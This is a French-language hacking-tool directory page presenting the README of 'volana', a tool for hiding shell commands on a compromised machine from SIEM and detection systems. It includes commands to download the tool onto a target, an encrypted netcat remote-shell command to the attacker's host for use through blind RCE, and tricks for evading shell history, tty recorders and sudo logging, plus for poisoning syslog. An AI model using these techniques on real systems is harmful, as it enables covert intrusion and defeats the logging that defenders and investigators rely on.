Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
volana — 🌒 Obfuscation de commandes shell pour éviter les systèmes de détection | Kitploit
Outils/GitHubGitHub/ariary/volana
ExploitationÉvasion IDS/IPSShellcodeTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubariary/volana

volana

🌒 Obfuscation de commandes shell pour éviter les systèmes de détection

Voir le dépôt
1209il y a 3 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

volana (lune en malgache)

root@kitploit:~
{ Utilisation ; 🌚(cacher de); 🌞(détecté par) } 

Obfuscation de commandes shell pour éviter les systèmes SIEM/détection

Lors d'un pentest, un aspect important est d'être furtif. Pour cette raison, vous devriez effacer vos traces après votre passage. Néanmoins, de nombreuses infrastructures enregistrent les commandes et les envoient à un SIEM en temps réel, rendant le nettoyage ultérieur seul inutile.

volana offre un moyen simple de cacher les commandes exécutées sur une machine compromise en fournissant son propre shell d'exécution (entrez votre commande, volana l'exécute pour vous). Ainsi, vous effacez vos traces PENDANT votre passage

Utilisation

Vous devez obtenir un shell interactif. (Trouvez un moyen de le lancer, vous êtes un hacker, c'est votre travail ! sinon). Ensuite, téléchargez-le sur la machine cible et lancez-le. C'est tout, vous pouvez maintenant taper la commande que vous voulez exécuter discrètement.

root@kitploit:~
## Download it from github release
## If you do not have internet access from compromised machine, find another way
curl -lO -L https://github.com/ariary/volana/releases/latest/download/volana

## Execute it
./volana

## You are now under the radar
volana » echo "Hi SIEM team! Do you find me?" > /dev/null 2>&1  #you are allowed to be a bit cocky
volana » [command]

Mot-clé pour la console volana :

  • ring : active le mode anneau (ring mode) c'est-à-dire que chaque commande est lancée avec plusieurs autres pour couvrir les traces (des solutions qui surveillent les appels système)
  • exit : quitte la console volana

depuis un shell non interactif

Imaginez que vous ayez un shell non interactif (webshell ou RCE aveugle), vous pouvez utiliser les sous-commandes encrypt et decrypt. Auparavant, vous devez construire volana avec une clé de chiffrement intégrée.

Sur la machine de l'attaquant

root@kitploit:~
## Build volana with encryption key
make build.volana-with-encryption

## Transfer it on TARGET (the unique detectable command)
## [...]

## Encrypt the command you want to stealthy execute
## (Here a nc bindshell to obtain a interactive shell)
volana encr "nc [attacker_ip] [attacker_port] -e /bin/bash"
>>> ENCRYPTED COMMAND

Copiez la commande chiffrée et exécutez-la avec votre RCE sur la machine cible

root@kitploit:~
./volana decr [encrypted_command]
## Now you have a bindshell, spawn it to make it interactive and use volana usually to be stealth (./volana). + Don't forget to remove volana binary before leaving (cause decryption key can easily be retrieved from it)

Pourquoi ne pas simplement cacher la commande avec echo [command] | base64 ? Et la décoder sur la cible avec echo [encoded_command] | base64 -d | bash

Parce que nous voulons être protégés contre les systèmes qui déclenchent des alertes pour l'utilisation de base64 ou qui recherchent du texte base64 dans les commandes. Aussi, nous voulons rendre l'investigation difficile et base64 n'est pas un véritable frein.

Détection

Gardez à l'esprit que volana n'est pas un miracle qui vous rendra totalement invisible. Son but est de rendre la détection d'intrusion et l'investigation plus difficiles.

Par détecté, nous entendons si nous sommes capables de déclencher une alerte si une certaine commande a été exécutée.

Cacher de

Seule la ligne de commande de lancement de volana sera capturée. 🧠 Cependant, en ajoutant un espace avant de l'exécuter, le comportement par défaut de bash est de ne pas la sauvegarder

  • Systèmes de détection basés sur la sortie de la commande history
  • Systèmes de détection basés sur les fichiers d'historique
    • .bash_history, ".zsh_history" etc ..
  • Systèmes de détection basés sur les traps de débogage bash
  • Systèmes de détection basés sur le système de journalisation intégré de sudo
  • Systèmes de détection traçant tous les appels système des processus à l'échelle du système (ex : opensnoop)
  • Enregistreurs de terminal (tty) (script, screen -L, sexonthebash, ovh-ttyrec, etc..)
    • Facile à détecter et à éviter : pkill -9 script
    • Pas un cas courant
    • screen est un peu plus difficile à éviter, cependant il n'enregistre pas l'entrée (entrée secrète : stty -echo => éviter)
    • La détection de commande pourrait être évitée avec volana avec chiffrement

Visible pour

  • Systèmes de détection qui ont une alerte pour les commandes inconnues (celle de volana)
  • Systèmes de détection basés sur un keylogger
    • Facile à éviter : copier/coller les commandes
    • Pas un cas courant
  • Systèmes de détection basés sur les fichiers syslog (ex : /var/log/auth.log)
    • Uniquement pour les commandes sudo ou su
    • Le fichier syslog pourrait être modifié et donc empoisonné à votre guise (par exemple pour /var/log/auth.log : logger -p auth.info "No hacker is poisoning your syslog solution, don't worry")
  • Systèmes de détection basés sur les appels système (ex : auditd, LKML/eBPF)
    • Difficile à analyser, pourrait être rendu illisible en effectuant plusieurs appels système de diversion
  • Injection personnalisée de LD_PRELOAD pour journaliser
    • Pas du tout un cas courant

Bug bounty

Désolé pour le titre racoleur, mais aucun argent ne sera fourni aux contributeurs. 🐛

Faites-moi savoir si vous avez trouvé :

  • un moyen de détecter volana
  • un moyen d'espionner la console qui ne détecte pas les commandes volana
  • un moyen d'éviter un système de détection

Report here

Crédits

  • 8 ways to spy on console
  • moonwalk : outil similaire qui efface les traces APRÈS le passage
Télécharger l’outil